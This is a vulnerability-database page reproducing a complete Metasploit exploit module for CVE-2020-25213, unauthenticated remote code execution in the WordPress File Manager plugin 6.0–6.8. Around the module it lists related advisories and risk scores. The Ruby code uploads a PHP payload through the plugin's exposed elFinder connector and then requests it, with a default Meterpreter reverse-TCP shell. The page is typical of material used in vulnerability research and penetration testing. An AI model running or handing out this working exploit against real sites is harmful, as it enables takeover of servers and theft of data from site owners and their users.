WordPress File Manager 6.8 Remote Code Execution

🗓️ 10 Nov 2020 00:00:00Reported by Imran E. DawoodjeeType

packetstorm🔗 packetstormsecurity.com👁 534 Views

WordPress File Manager 6.8 Remote Code Execution exploi

Reporter	Title	Published	Views	Family All 34
0day.today	WordPress File Manager 6.8 Remote Code Execution Exploit	10 Nov 202000:00	–	zdt
0day.today	WordPress WP-file-manager v6.9 Plugin - Unauthenticated Arbitrary File Upload Exploit	3 Apr 202300:00	–	zdt
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File_Manager	25 Aug 202022:07	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File_Manager	22 Jan 202316:54	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Filemanagerpro File_Manager	10 May 202612:07	–	githubexploit
ATTACKERKB	CVE-2020-25213	9 Sep 202000:00	–	attackerkb
BDU FSTEC	The vulnerability of the File Manager plugin (wp-file-manager) of the WordPress content management system allows a hacker to execute arbitrary PHP code on the target system.	24 Aug 202100:00	–	bdu_fstec
Circl	CVE-2020-25213	17 Oct 202020:40	–	circl
CISA KEV Catalog	WordPress File Manager Plugin Remote Code Execution Vulnerability	3 Nov 202100:00	–	cisa_kev
CNVD	WordPress wp-file-manager Arbitrary File Upload Vulnerability	14 Sep 202000:00	–	cnvd

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HTTP::Wordpress  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',  
'Description' => %q{  
The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and  
execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php  
extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write  
PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Alex Souza (w4fz5uck5)', # initial discovery and PoC  
'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module  
],  
'References' =>  
[  
[ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],  
[ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],  
[ 'CVE', '2020-25213' ]  
],  
'Platform' => [ 'php' ],  
'Privileged' => false,  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
[  
'WordPress File Manager 6.0-6.8',  
{  
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }  
}  
]  
],  
'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020  
'DefaultTarget' => 0  
)  
)  
register_options(  
[  
OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),  
OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])  
]  
)  
end  
  
def check  
return CheckCode::Unknown unless wordpress_and_online?  
  
# check the plugin version from readme  
check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')  
end  
  
def exploit  
# base path to File Manager plugin  
file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')  
# filename of the file to be uploaded/created  
filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"  
register_file_for_cleanup(filename)  
  
case datastore['COMMAND']  
when 'upload'  
elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)  
when 'mkfile+put'  
elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)  
elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)  
end  
  
payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)  
print_status("#{peer} - Payload is at #{payload_uri}")  
# execute the payload  
send_request_cgi('uri' => normalize_uri(payload_uri))  
end  
  
# make it easier to switch between "upload" and "mkfile+put" exploit methods  
def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})  
filename = opts['filename']  
  
# prep for exploit  
post_data = Rex::MIME::Message.new  
post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')  
  
case elfinder_cmd  
when 'upload'  
post_data.add_part('l1_', nil, nil, 'form-data; name="target"')  
post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")  
when 'mkfile'  
post_data.add_part('l1_', nil, nil, 'form-data; name="target"')  
post_data.add_part(filename, nil, nil, 'form-data; name="name"')  
when 'put'  
post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')  
post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')  
end  
  
res = send_request_cgi(  
'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),  
'method' => 'POST',  
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",  
'data' => post_data.to_s  
)  
  
fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res  
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200  
end  
end  
`

10 Nov 2020 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.94411